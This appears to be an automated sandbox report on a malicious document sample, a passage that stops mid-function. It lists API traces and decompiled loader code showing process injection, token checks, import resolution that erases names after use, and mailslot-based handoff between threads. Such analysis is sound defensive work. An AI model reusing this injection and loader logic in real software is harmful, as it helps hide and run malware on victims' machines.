Initial sample Analysis ID:	60981
Initial sample SHA 256:	93E3B205BA5588173BA0C1C9E6CDD1BABA4EC461E498986DC9851FAC67FA9346
Initial sample name:	Request_592655.doc

Similar Executed Functions

Function 002E432F, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 209 Total matches: 33filememorytime

Similarity

Total matches: 33
API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileFindFirstFileGetFileTimeStrChrStrRChrlstrcatmemcpy
String ID: pnls$}nls
API String ID: 315724681-4252118926
Opcode ID: 8b235e28e70d70ecdff0991f1e972a36896af92a2b8f458741844e655a4b3a9d
Instruction ID: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
Opcode Fuzzy Hash: 4A21B1031986E3D1C932A943E2C2B921651FF42E67C5C63B144FCB63825F14B58F6B9D
Instruction Fuzzy Hash: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E43CD
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 002E43E1
CloseHandle.KERNEL32(?), ref: 002E43F8
StrRChrA.SHLWAPI(002E11A6,00000000,0000005C), ref: 002E4404
lstrcat.KERNEL32(002E11A6,002E825D), ref: 002E443E
FindFirstFileA.KERNELBASE(002E11A6,?), ref: 002E4454
FindNextFileA.KERNELBASE(?,?), ref: 002E4486
StrChrA.SHLWAPI(?,0000002E), ref: 002E44F4
memcpy.NTDLL(00000000,?,00000000), ref: 002E452D
FindNextFileA.KERNELBASE(?,?), ref: 002E4542
CompareFileTime.KERNEL32(?,?), ref: 002E456B
HeapFree.KERNEL32(00000000,00000000,002E8049), ref: 002E45A1
HeapFree.KERNEL32(00000000,002E11A6), ref: 002E45B1

Strings

pnls, xrefs: 002E4340, 002E4351, 002E4367, 002E4373, 002E438B, 002E4393
}nls, xrefs: 002E436C

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E1CB2, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195 Total matches: 38native

Similarity

Total matches: 38
API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
String ID: pnls
API String ID: 82859500-141991303
Opcode ID: e910601ac135763dc590ea94eb2919e54113fda6ecca70254a0bfb8fa838b587
Instruction ID: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
Opcode Fuzzy Hash: 7421CD4515896286DEA3B4954257FC7D142FF83F88C9CFBB4949A5669B0E00300BEB4F
Instruction Fuzzy Hash: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714

APIs

Part of subcall function 002E278F: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
Part of subcall function 002E278F: memset.NTDLL ref: 002E280F
Part of subcall function 002E278F: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
Part of subcall function 002E278F: NtClose.NTDLL(?), ref: 002E283F

memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F

Part of subcall function 002E1B66: GetModuleHandleA.KERNEL32(002E80DB,?,CCCCFEEB,002E1E8C,?,?,?,00000000), ref: 002E1B99
Part of subcall function 002E1B66: memcpy.NTDLL(?,3!?w,00000018,002E845C,002E8400,002E8451), ref: 002E1C04

memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F

Part of subcall function 002E39A5: memset.NTDLL ref: 002E39C4

Part of subcall function 002E1C13: memcpy.NTDLL(CCCCFEEB,002E7478,00000018,CCCCFEEB,002E845C,CCCCFEEB,002E8400,CCCCFEEB,002E8451,CCCCFEEB,002E1E84,?,002E23F9,?,?,00000000), ref: 002E1CA4

NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
CloseHandle.KERNEL32(00000000), ref: 002E1EE0
memset.NTDLL ref: 002E1EF4

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784

Part of subcall function 002E284E: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28AE
Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28C3
Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 002E2905

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

Strings

pnls, xrefs: 002E1D8C

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3122, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native

Similarity

Total matches: 84
API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
String ID:
API String ID: 1776017925-0
Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc

APIs

NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

NtClose.NTDLL(00000000), ref: 002E31D4
NtClose.NTDLL(002E618C), ref: 002E31DD

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread

Similarity

Total matches: 233
API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
String ID:
API String ID: 405287775-0
Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959

APIs

memset.NTDLL ref: 002E38A2
GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995

Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7

Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD

memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D

Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native

Similarity

Total matches: 297
API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
String ID:
API String ID: 2756933261-0
Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
memset.NTDLL ref: 002E280F
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
NtClose.NTDLL(?), ref: 002E283F

Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative

Similarity

Total matches: 229
API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 3367774474-0
Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd

APIs

NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
SetLastError.KERNEL32(00000000), ref: 002E3EA7

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native

Similarity

Total matches: 236
API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 1449157707-0
Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa

APIs

NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native

Similarity

Total matches: 238
API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 3946382534-0
Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536

APIs

NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95
threadsynchronization

Similarity

Total matches: 95
API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
String ID:
API String ID: 2699342322-0
Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82

C-Code - Quality: 100%

			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs

CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9

Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9

TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
CloseHandle.KERNEL32(?), ref: 004016F0
GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
CloseHandle.KERNEL32(?), ref: 00401704
GetLastError.KERNEL32(?,00000000), ref: 0040170D

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95
sleepfile

Similarity

Total matches: 95
API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
String ID: \\.\mailslot\msl0
API String ID: 1001206095-622273203
Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981

C-Code - Quality: 94%

			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs

CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
GetLastError.KERNEL32 ref: 00401126
Sleep.KERNEL32(00000064), ref: 00401131

Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
memset.NTDLL ref: 004011C8

Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213

CloseHandle.KERNEL32(?), ref: 004011E4

Strings

\\.\mailslot\msl0, xrefs: 00401113

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring

Similarity

Total matches: 182
API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
String ID:
API String ID: 1756712956-0
Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b

APIs

PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
StrStrIW.SHLWAPI(00000000), ref: 002E12E4
HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143
librarystringloader

Similarity

Total matches: 143
API ID: lstrlenmemset$GetProcAddressLoadLibrary
String ID: ~
API String ID: 3655391705-1707062198
Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11

C-Code - Quality: 100%

			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs

LoadLibraryA.KERNEL32(?), ref: 004013B6
lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
memset.NTDLL ref: 004013D3
GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
memset.NTDLL ref: 0040143B

Strings

~, xrefs: 00401471

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E3F3A, Relevance: 10.6, APIs: 7, Instructions: 75 Total matches: 204

Similarity

Total matches: 204
API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
String ID:
API String ID: 1755075983-0
Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
CloseHandle.KERNEL32(002E7494), ref: 002E3FEC

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread

Similarity

Total matches: 199
API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
String ID:
API String ID: 2400451634-0
Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775

APIs

InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5

Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038

CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
CloseHandle.KERNEL32 ref: 002E1141
HeapDestroy.KERNEL32 ref: 002E114E

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190
memorysleepfile

Similarity

Total matches: 190
API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
String ID: \\.\mailslot\msl0
API String ID: 2393858888-622273203
Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395

C-Code - Quality: 96%

			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
